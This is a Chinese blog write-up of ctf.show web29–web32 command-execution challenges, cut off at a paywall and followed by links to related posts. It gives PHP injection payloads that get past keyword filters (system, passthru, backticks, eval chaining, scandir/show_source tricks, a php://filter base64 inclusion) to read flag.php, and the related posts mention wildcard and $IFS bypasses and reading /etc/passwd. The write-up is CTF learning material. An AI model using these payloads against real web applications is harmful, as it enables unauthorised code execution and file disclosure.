ctf.show之命令执行

原创

已于 2024-09-29 20:38:08 修改 · 370 阅读

标签

#网络安全 #安全 #系统安全 #web安全

收录于

于 2024-09-26 20:34:24 首次发布

web29 : 命令执行，需要严格的过滤

分析可知:

1.传入的是一个参数，名为c

2. 根据函数的性质，参数中是不可以有"flag",大小写都不可以有。

3. 将这个名为c的参数按php语言进行解析

以上三个均为重点，这个很关键，

1、如?c=system("ls");

则相当于在执行php函数 system()

结果就是可以查看当前的目录中的文件

得到的结果是 flag.php 和 index.php (此题确实是有这两个文件的),如:

因此同理，在这里我们可以直接用?c=system("tac f*.php"); 来获取到这个文件，并得到flag。

web30 ：命令执行，需要严格的过滤

解法思路 : 题目过滤了flag,system,php等，我们就可以考虑用什么来替代system执行系统命令，主要有passthru等

因此，解法1: c=passthru("tac fl*"); (绕过)

解法2: c=echo(`ls`); (反字节符配合echo)

解法3: c=eval($_GET[1]);&1=system("tac%20flag.php");

如下图: （即可得到flag);

web31 : 命令执行，需要严格的过滤

分析: 此题比上一题多过滤了"cat sort shell"以及,点，空格，单引号这些字符串,但我们可以用上题的第三种方法,即:

c=eval($_GET[1]);&1=system("tac%20flag.php");

当然，此题的wp作者也给了一个其他解决方案:

c=show_source(next(array_reverse(scandir(pos(localeconv())))));

web32 : 命令执行，需要严格的过滤

题解:

解法1: 文件包含

url/c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Tux6969

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

ctf.show与学习笔记

Q221022的博客

01-29

3420

ctf.show 1.密码学签到看到密文之后不难发现，flag就是倒着写的，直接将密文倒叙输出就是答案 2. 看到题目，全是由符号组成的，将题目内容全部复制到控制台，回车即可得到答案 3. 第三题与第二题看起来是一样的，所以先将其复制到控制台，发现报错了，有中文的引号，将所有的引号全部换成英文之后还是没有得到flag，········（不会了，没有思路了） 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...

参与评论您还未登录，请先登录后发表或查看评论

ctf show web(命令执行） 29

最新发布

2502_94318588的博客

04-26

946

因为你输入的是 fla*，里面没有完整的 flag，所以 preg_match 觉得你是安全的，放你通过了。如果你输入 cat fla*：Shell 会匹配到 flag.php 和 flame.txt，最终执行 cat flag.php flame.txt。替换命令：如果目录下只有 flag.php 符合条件，Shell 会在后台默默地把你的命令从 cat fla* 替换成 cat flag.php。Linux 系统的视角：它拿到 fla* 后，通过通配符机制将其“还原”成了 flag.php。

ctfshow 命令执行

m0_74097148的博客

05-21

5166

dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显，让命令回显，我们进行命令分隔。如下图第一个元素为点号。

ctfshow-命令执行

m0_72125469的博客

09-10

2585

方法3 比较经典这是一个上传文件的模版向指定url的服务器上传文件然后服务器会自动将上传的文件放置指定目录在linux里面临时存放文件的目录可能会被定时删除这个目录是/tmp，然后一般网页文件会命名为php?因为，${RANDOM}可以出现4或5，可以构造/?echo $((${##}${##}+${##}${##}+${##}${##}+${##}+${##}+${##})) 也是36。

ctf.show 入门篇

Sky_Bird_的博客

12-03

1563

ctf.show web入门 1.web 1 打开后如图所示，按F12，看到flag 2.web 2 打开后发现按F12没有用，直接在网址前加view-source: 拿到flag 3.

CTFSHOW 命令执行

asmartrman的博客

09-27

2525

ctfshow-web入门-命令执行板块（持续更新）

ctf_show笔记篇（web入门---命令执行）

whale_waves的博客

03-02

2039

${PWD::${##}}???${PWD::${##}}?${USER:~A}?$IFS????.??? ####我的环境$USER是root，ctfshow的不是所以这里是正常的

ctf.show web3 文件包含+php伪协议+命令执行

m0_46412682的博客

07-12

2528

ctf.show web3 php伪协议+文件包含+命令执行 题目的提示：一开始的页面：看到这个语句，那就是文件包含了，先试下file:////etc/passwd,有反应试下有没有flag.txt文件，好像没有这个文件那现在我们利用php伪协议 php://input post提交命令，这里不知道为什么我用hackerbar post提交没有反应，那只能burp抓包咯，利用命令执行 ls，查看当前有啥文件这里出现了一个ctf_go_go_go,那我们用cat打开 flag{a1b1cd4e-

CTF show 萌新命令执行

small_whitehat的博客

02-27

228

CTF show 萌新命令执行

[CTF]ctfshow命令执行

m0_63416413的博客

03-19

504

在ctfshow做题中随手记录，不尽详细

showCTF Web入门题系列

Hello_super的博客

09-17

1018

背景知识介绍： vim 中的swp即swap文件，在编辑文件时产生，它是一个隐藏的文件。这个文件时临时交换文件，用来备份缓冲区的内容，如果原文件名为index.php，那么swp文件名为.index.php.swp。如果所编写的文件正常退出，则这个临时交换文件会自动删除。需要注意的是如何你只是对原文件进行读取，并没有写入内容，则这个临时交换文件则不会产生。 show ctf web入门 9 读题发现有提示：猜测这个网址下可能存在vim编写是留下的临时交换文件.swp。直接输入: u.

ctfshow命令执行刷题总结

m0_62422842的博客

07-01

1045

命令执行常用姿势总结

showCTF 入门文件包含系列

Hello_super的博客

09-21

491

web78 读取源代码：心想，就这？直接:http://url地址/?file=flag.php，但是这样出不来，页面什么也没有，想着这毕竟是一个PHP文件，可能在我们包含的时候被服务器给解析了。所以我们必须要让它不解析，这里提供一种方法，PHP伪协议中的：php://filter 直接: http://url地址/?file=php://filter/read/convert.base64-encode/resource=flag.php 成功获取flag.php的文件内容，在线网址解base64.

ctf.show之信息搜集

weixin_68477635的博客

09-24

644

way1: view-source是一种协议，早期基本上每个浏览器都支持这个协议。如果要在IE下查看源代码,只能使用查看中的"查看源代码"命令.以前的使用方法：在浏览器地址栏中输入 view-source: sURL。这题是phps源代码泄露，因为phps即可看源代码，则我们访问index.php,最后把文件下载出来并查看即可得到ctfshow。如上图所示，打开F12,再点击Network，可能没有内容，那么我们点击网页左上角刷新按钮，就有了响应头。way2:Ctrl+U 查看当前网页的源代码。

ctfshow---命令执行

fainpo的博客

03-20

1952

就是让标准输出重定向到/dev/null中（丢弃标准输出），然后错误输出由于重用了标准输出的描述符，所以错误输出也被定向到了/dev/null中，错误输出同样也被丢弃了。data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么作用。$((~$(( $((~$(())))+$((~$(())))+$((~$(()))) )))) 这个是2。

ctf_show笔记篇（web入门---爆破）

whale_waves的博客

03-02

1226

这一题很像是版本漏洞，通过看提示从php4.2.0开始就不用mt_scrand(seed)来播种，会自动播种，如果设置了mt_scrand(seed)并且seed有值，那就会生成伪随机数（俗称假的随机数），生成的数字就会固定。首先呢，他会验证这中间部分是否日期，如果长度或者大小都不正确的话，会直接弹窗且不发包，这里我直接用bp爆破模式添加了三个放payload的位置。这里有和24题一样的漏洞，使用了mt_srand()播种就会生成特定的随机值，这里我们需要传入同样的随机值让rand的变量为零才能进入if。

CTFSHOW命令执行做题总结（小白文章）

qq_62147945的博客

03-23

786

直接上聊天记录了由于我是一个小白，而且也是第一次写文章，第一次写总结，有的思路逻辑可能有错误，或者文章结构杂乱，佬们多多包涵就行了（狗头）。

CTFshow-web入门-命令执行

m0_52920608的博客

03-26

5871

CTFshow web入门 命令执行 ctfshowweb命令执行

CTFshow-命令执行

weixin_44770698的博客

06-25

3635

ctfshow-web 命令执行

ctf.show命令执行(web29-web124)

wanan的博客

08-31

6874

ctf.show命令执行(web29-web124)